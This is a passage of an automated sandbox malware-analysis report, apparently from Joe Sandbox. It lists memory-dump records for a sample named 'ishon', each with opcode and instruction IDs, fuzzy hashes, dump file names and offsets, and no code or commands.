                                                                          • Instruction Fuzzy Hash: C0214F75A002199FCB15DFA8C4549DEBFB6EF8C320F14812AE815A7390CB759C81CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55d779baa33020419d059813165a24b6cc71c3faeefc6ce6a9510530267006a1
                                                                          • Instruction ID: ac749c2c0c4b1eba125cbbd48ad49a36301660f26ff291236f735db8d3775f7a
                                                                          • Opcode Fuzzy Hash: 55d779baa33020419d059813165a24b6cc71c3faeefc6ce6a9510530267006a1
                                                                          • Instruction Fuzzy Hash: 5231F2B4900218CFDB94DF64E88ABEEBBB2FB0A345F50509AD449A3281DB385DC4CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d420649ef3aeb7bb6f78b68b29daaf246fcb3ca3e8df7b0f48a9e5b71908fb0b
                                                                          • Instruction ID: 5695372114acfc6975d0c94c05223e81201ce72c5ced25cbeab10c3adca935e4
                                                                          • Opcode Fuzzy Hash: d420649ef3aeb7bb6f78b68b29daaf246fcb3ca3e8df7b0f48a9e5b71908fb0b
                                                                          • Instruction Fuzzy Hash: 313113B4900208CBDB94DF64D98ABEEBBB2FB0A345F40509AD549A3281DB385DC5CF41
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 706703359808ce9c9905b755847ec3dab5a04da102718075d7fcbb69cc40a377
                                                                          • Instruction ID: 504beb5d6d6b29dfc8102247d96b829d5ff7599faa3777631c637cf2cc82d2b1
                                                                          • Opcode Fuzzy Hash: 706703359808ce9c9905b755847ec3dab5a04da102718075d7fcbb69cc40a377
                                                                          • Instruction Fuzzy Hash: 322119B8D0424ACFCB44DFADC6546AEBFF5BB48301F15856ADA15A7340D7349982CF80
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc8c6439f43389d5ae3bf1dccfa466976d6a5f1b0e3df45344782c429912c36d
                                                                          • Instruction ID: 8ac79e3ea72a4b6184977189a47a70f6d9fa0a2659f5a178308f3076243d4030
                                                                          • Opcode Fuzzy Hash: dc8c6439f43389d5ae3bf1dccfa466976d6a5f1b0e3df45344782c429912c36d
                                                                          • Instruction Fuzzy Hash: 85110BBA7002159FCB61DF759805BEA7BE6BB89700F14442FE505D7340DB74C94ACBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89ea0b16bfe9653181fb7f3dfb590825ae0e8a11c260e83f02a28f4f07f6bf58
                                                                          • Instruction ID: 332a1651552da1b4adecf59e2fcba63cc2c338da1e1eaee366c153ce8a2dcf0e
                                                                          • Opcode Fuzzy Hash: 89ea0b16bfe9653181fb7f3dfb590825ae0e8a11c260e83f02a28f4f07f6bf58
                                                                          • Instruction Fuzzy Hash: C231F5F4900208CFDB94DF68D999BEDBBB2FB06345F50109AD049A7281DB385D85CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf15ed0f89431245d600eb16c1c1778cb14fb830d022d672438060c64cb4a179
                                                                          • Instruction ID: 86048c2eca02ba9bf9ddd4e72b507f28bef27ae26cdaa194a568d55ba46b0218
                                                                          • Opcode Fuzzy Hash: cf15ed0f89431245d600eb16c1c1778cb14fb830d022d672438060c64cb4a179
                                                                          • Instruction Fuzzy Hash: A13104F4900209CFEB94DF64D99ABEDBBB2FB06346F40609AD149A3281DB385D84CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ff1e0777de22b44c14dd66ae6ae4daab81273c7642326eecb18e59a4b1d992
                                                                          • Instruction ID: 43f187ad0493deea88b72245bd4eb640e5ed83d842181ec60a9e83940fce59f9
                                                                          • Opcode Fuzzy Hash: 06ff1e0777de22b44c14dd66ae6ae4daab81273c7642326eecb18e59a4b1d992
                                                                          • Instruction Fuzzy Hash: E42128F4900208CFEB94DF55D88ABEEBBB2FB06345F40509AD049A7241DB385D85CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                                                                          • Instruction ID: ce825f8d9c534849fdb9ac9605cb3b9934374f04a20d76aab5c69c1d71599319
                                                                          • Opcode Fuzzy Hash: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                                                                          • Instruction Fuzzy Hash: 80217C755093848FDB03CF24D994715BF71EB46314F28C5EEDA498B2A7C33A980ACB62
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                          • Instruction ID: 11d893d6f3fbbd51bee1d29b5e6278e42b24255ea2a1948aea8cda5011824a08
                                                                          • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                          • Instruction Fuzzy Hash: A211DC76504285CFDB02CF18D9C0B16FF61FB84210F2486A9DA090B656C33AD41ACBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47a0cb976b6f5062cf0815a7403fe9e73c10401040aa7f31fad432ae12625057
                                                                          • Instruction ID: 4e523dc109036796c2163138938bdcb33444e19e3416dc15f57be930d1bede9b
                                                                          • Opcode Fuzzy Hash: 47a0cb976b6f5062cf0815a7403fe9e73c10401040aa7f31fad432ae12625057
                                                                          • Instruction Fuzzy Hash: 4611C2B9B002159FCB60DF698805BEE7BF6AF89700F10442AE505D7390DB78CD06CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2500ae2ebe64c053743827abec00563c8b13dfa5d383b7397d57640107590f20
                                                                          • Instruction ID: 91708f7310c68e33ed944d024594ffacb7337c7773ac59f28aa663b39b8a5dbf
                                                                          • Opcode Fuzzy Hash: 2500ae2ebe64c053743827abec00563c8b13dfa5d383b7397d57640107590f20
                                                                          • Instruction Fuzzy Hash: 15216279A42259AFCB44CF98D5A4EADB7F2BF49300F214059E401EB371CB34AD45CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed3792ccbeda34e66c4e364a8463878608d2f3f3515e193d0986338a07484568
                                                                          • Instruction ID: 05dec89f43b0dc3389f573fda9caf44e3d1edc36f9ffb325674e28bf3ced5c9d
                                                                          • Opcode Fuzzy Hash: ed3792ccbeda34e66c4e364a8463878608d2f3f3515e193d0986338a07484568
                                                                          • Instruction Fuzzy Hash: 0701447A340215AFDB10CE59DC95F9BB7A9FB88721F10806AFA15CB290C6B2D9158B90
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 216ea41c4678393a327e5fb7f0062379866332b049060b39dfb3ab753fb8e1cb
                                                                          • Instruction ID: c31428432a670363b444fc66ffdaeb4f4aecc5a23b64b3421c03f250ec94f43b
                                                                          • Opcode Fuzzy Hash: 216ea41c4678393a327e5fb7f0062379866332b049060b39dfb3ab753fb8e1cb
                                                                          • Instruction Fuzzy Hash: 191127B8D082899FDB44DFAA96412EEBFF5AB85300F4585ABD508A3241D7344A85CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42f77f477ed9aa2dad08efb056fd8821fc5a45d71ec4c879e463b31748c7d34f
                                                                          • Instruction ID: 82b918d2e684e596f1aabf4819a07f96fca64487fb3c4b559008243b539a9a1c
                                                                          • Opcode Fuzzy Hash: 42f77f477ed9aa2dad08efb056fd8821fc5a45d71ec4c879e463b31748c7d34f
                                                                          • Instruction Fuzzy Hash: 0901DBB72055519FC301CB5ED880892FB65EB86360715D17BE528C7742C725EC5BC7E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 469cc9407915b465bd1f95cdb5b06d3034c6764d5dd92d4bda1461616d876960
                                                                          • Instruction ID: 4f555a4aab513f91dac438bfd9884519d307c91c66453c498390999f59948fb3
                                                                          • Opcode Fuzzy Hash: 469cc9407915b465bd1f95cdb5b06d3034c6764d5dd92d4bda1461616d876960
                                                                          • Instruction Fuzzy Hash: 66F02872B042215FE315961498107ABFBA8EF89320F04456FE5048B391CAB5AC41C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de1c0985eeed05f80059637e548ab2e23e7888688363d7df667aa6612a27c2c3
                                                                          • Instruction ID: eb0d9078c38ea1ec98ed30da8879d4ce95b11574d2237f09608c74037655404b
                                                                          • Opcode Fuzzy Hash: de1c0985eeed05f80059637e548ab2e23e7888688363d7df667aa6612a27c2c3
                                                                          • Instruction Fuzzy Hash: 600124B4C09248DFDB41DFA8D9542EEBFF4FB49310F1084ABD405A3281D7345A45CBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 375711e7216f010e9608b141fdbb8f01a8392f4500c3b7bb8f142bcd8961a95a
                                                                          • Instruction ID: defbd566b4c75894e5e5dec5dd4e3a0bb71d2c6a26796ad703356fd89927b11c
                                                                          • Opcode Fuzzy Hash: 375711e7216f010e9608b141fdbb8f01a8392f4500c3b7bb8f142bcd8961a95a
                                                                          • Instruction Fuzzy Hash: 41016D78E04248AFC781CFA8D8415ADFBB4EB49210F10C1DBD81CD7741C6369A12CF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d592233a0f7c7073d881caa700391c41e6aad6318119abbacad7ca73b5718786
                                                                          • Instruction ID: 0eac04c6544a85a5b7986e42011973218701637d9301750b3d0878b5eda6927d
                                                                          • Opcode Fuzzy Hash: d592233a0f7c7073d881caa700391c41e6aad6318119abbacad7ca73b5718786
                                                                          • Instruction Fuzzy Hash: C1013CF5614205AFDB24CE98D485ADEFBF5FB48320F1484ABE648D7290E731D981CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7c3f54c96cbafccac549a3fed02c7d5475a2477214d963c7f052abdfaa334df
                                                                          • Instruction ID: dff61857d64d4fe7a150f15daf8b3d7de348cf76f9f311ef86e904e2b9f15b90
                                                                          • Opcode Fuzzy Hash: b7c3f54c96cbafccac549a3fed02c7d5475a2477214d963c7f052abdfaa334df
                                                                          • Instruction Fuzzy Hash: BAF02BE6B4E2A15FD32242381C107A57FE19B86204F0404DFC1818F3A2DF568803C351
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64ecfd4f67a7a8c84605196a3ade45d66895bc4b7199208b66bbdc3cabe6fd8b
                                                                          • Instruction ID: e5549cbfb71988ee9e0ec66785b2585a83342fcbe39a30ac09d8d6b19cd1040d
                                                                          • Opcode Fuzzy Hash: 64ecfd4f67a7a8c84605196a3ade45d66895bc4b7199208b66bbdc3cabe6fd8b
                                                                          • Instruction Fuzzy Hash: 06F0E975F442215FE71496189810B6BFBE9EFC9710F14482ED5059B390CBB5AC4183D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7224bc639c32fa72da49c08d269ae08d50f3f5451909df167f36a289b1fed17
                                                                          • Instruction ID: 7851c2768c7b31bcfa3a1da5f42d08b2cbb8be14abeb964d6c35c55c27badc55
                                                                          • Opcode Fuzzy Hash: c7224bc639c32fa72da49c08d269ae08d50f3f5451909df167f36a289b1fed17
                                                                          • Instruction Fuzzy Hash: 3AF0307A3042519FC705CF69E894C9ABBA9AF8A66031181ABF505CB321CA75DC04CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: acfa171ff8dc281321afadf12462f5b12b7fe1775118b6524efdf836158b3c02
                                                                          • Instruction ID: d0bf6edeb64d6d22038b148d3ab1a029f74320a5e2b6f4359d94872617deb335
                                                                          • Opcode Fuzzy Hash: acfa171ff8dc281321afadf12462f5b12b7fe1775118b6524efdf836158b3c02
                                                                          • Instruction Fuzzy Hash: B9018CB4A00258CFE750DF69DD98BD97BB6FB86306F505289E448A7380DB385C86CF10
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd07a981c271415bba9dbaa3c74ee506c87335dc33b7aaa80b7668936b43cd4b
                                                                          • Instruction ID: d5f0cefc729c1539bba9044ebec1f7bfe9bcd89ead768bb262c3460f98f1aaf4
                                                                          • Opcode Fuzzy Hash: dd07a981c271415bba9dbaa3c74ee506c87335dc33b7aaa80b7668936b43cd4b
                                                                          • Instruction Fuzzy Hash: D61192B49016248FDBA4DF24DD54A9ABBF1BF49202F5051DAD50EA7291DB305E85CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fd9b03017ec4d30f3b5fd63dfa4f8aafb25b1600c285db4e3a2542f9e96550b
                                                                          • Instruction ID: f0b03d20b3b1dd44ba19fb36f0e32a0a5f6b5ba44594d424bd7042e561fb7611
                                                                          • Opcode Fuzzy Hash: 8fd9b03017ec4d30f3b5fd63dfa4f8aafb25b1600c285db4e3a2542f9e96550b
                                                                          • Instruction Fuzzy Hash: EC01E4B8A041598FD794DFAAC8846A9B6F6FB8A341F40A16E840AA7245DF348C81CF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: acd62171ce855bfade37a9ecb54450996653ec1537c6dfff9b434991da806be7
                                                                          • Instruction ID: 3a7579f0db9c33756f09d772b922524dd5dcb1ef4638202aea884293bcee5c58
                                                                          • Opcode Fuzzy Hash: acd62171ce855bfade37a9ecb54450996653ec1537c6dfff9b434991da806be7
                                                                          • Instruction Fuzzy Hash: 7CF014B4D01209DFCB80DFA8D9442AEBBF8BB08310F2044AA9808A3280E7315A51CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa33b6697d005f678cbf25878c05063080aa1e49c0512ae088d0de27a0eebdef
                                                                          • Instruction ID: a045f12352e0039e066667661c3f97b57a766ae90103f3dab0c57d23d33e591b
                                                                          • Opcode Fuzzy Hash: aa33b6697d005f678cbf25878c05063080aa1e49c0512ae088d0de27a0eebdef
                                                                          • Instruction Fuzzy Hash: DD0104B8A08218CFCB50DFA4D9847AABBF2FB4A701F40519A840DA7344DB385E85CF52
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 649ae356742f6a9968dbceb0d40f62d28cdcf29e4b56ce5da15ba4d13422429e
                                                                          • Instruction ID: c7f7c87d185ccf79b7deeb6babdee655b1136c55c95f62d9d8a32befd6eebb68
                                                                          • Opcode Fuzzy Hash: 649ae356742f6a9968dbceb0d40f62d28cdcf29e4b56ce5da15ba4d13422429e
                                                                          • Instruction Fuzzy Hash: CAF08278E08348AFCB51CFB8D4512ECBFF0AB49214F1090EBD80897352C6355A46EF41
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65c3ed1d636f27b393c2dda1eb2f3ba871a63bfcabc4adb254c5e4bdef43e533
                                                                          • Instruction ID: 79f4f3f262c7fabb83910deb602031625b944ce4996a98d07c8972a7004712b2
                                                                          • Opcode Fuzzy Hash: 65c3ed1d636f27b393c2dda1eb2f3ba871a63bfcabc4adb254c5e4bdef43e533
                                                                          • Instruction Fuzzy Hash: 9FE0ED7891A288AFC741DFB8D4092E9BFB49B06200F0081ABD88493A42DA305A86DB61
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08ebc074097e8f9a56a9cbf59a33c1eee6ff2b3918d6c4a7353e5b33fc364d59
                                                                          • Instruction ID: 1b94de86bc4eaeaabe0911dbf1064393c003d082d3c691bea80dffe596bd39f2
                                                                          • Opcode Fuzzy Hash: 08ebc074097e8f9a56a9cbf59a33c1eee6ff2b3918d6c4a7353e5b33fc364d59
                                                                          • Instruction Fuzzy Hash: 0BE02236A04348EFCB01DF70F8406EDBBB9EF45200F40429AD404CB241DA344F069BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0d029c6beabd08cc9d7ec806e9a97544a3c0227df9b026bc1d733b1a09e459d
                                                                          • Instruction ID: 8dbe86b91dbafeb5e305200446517dbdeb24eb311a1a2a29f91f9cc87324f2d2
                                                                          • Opcode Fuzzy Hash: b0d029c6beabd08cc9d7ec806e9a97544a3c0227df9b026bc1d733b1a09e459d
                                                                          • Instruction Fuzzy Hash: 86F0A0B8A192889FC741DBB8D4422E8BFF09B05201F1080DBD848C7352D6329E45CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a1483186b6468235d5588f80773fbf37ed9a6281a46c0f1252dbf149ac48d4d
                                                                          • Instruction ID: 23af6524bdcab9324db30e32fa085d2c34c5403cb9cfb32b2a052d9db449b0a6
                                                                          • Opcode Fuzzy Hash: 1a1483186b6468235d5588f80773fbf37ed9a6281a46c0f1252dbf149ac48d4d
                                                                          • Instruction Fuzzy Hash: 0DF0E578908208DFC706CFA4E9414E8BF70FB42310F50C0ABD84457356C6315A56DF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e231b9a0ed1c8a8af5420b378df6ab52b7faee819bcca9debf244c132a3887dd
                                                                          • Instruction ID: 3597490c7df3d2c4374849c7957b049d774bad41cae382e62d3399a22a8198a3
                                                                          • Opcode Fuzzy Hash: e231b9a0ed1c8a8af5420b378df6ab52b7faee819bcca9debf244c132a3887dd
                                                                          • Instruction Fuzzy Hash: 8FE09230A0A24CAFCB11DF74E9006EDBBF5FF45220B5007DAD418D3682DA355F4487A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8370daa6935a4427aaa418e14cb31d854f049d9b2fb5ef4681c45df8cef00263
                                                                          • Instruction ID: 91fb7ca0d7a78c3e3cf5f07a758b23e48f9babcd6b8aa7a510a2adf8e0c6d034
                                                                          • Opcode Fuzzy Hash: 8370daa6935a4427aaa418e14cb31d854f049d9b2fb5ef4681c45df8cef00263
                                                                          • Instruction Fuzzy Hash: E7E012312442159BC7149A1AF884C4BFB9EEEC0365710C539A10A87225DA74ED09C690
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 366cf75b2c66bb8393a9fc2ba437ed52e6a0c6357100042c860637126f32e50f
                                                                          • Instruction ID: 45e615d4a424e1367eecd6cffcbffed07a40c4188ab6f7c2f103b76e9e9c06cf
                                                                          • Opcode Fuzzy Hash: 366cf75b2c66bb8393a9fc2ba437ed52e6a0c6357100042c860637126f32e50f
                                                                          • Instruction Fuzzy Hash: A4F0FFB49046A8CFEB94DF29ED9879A7AB5FB05342F00059AC00D93240C7394E85DF01
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction ID: 491a1bf61762bf6a7b4c9d2c8334fffe305b305c5066e75fec9688f0de099d30
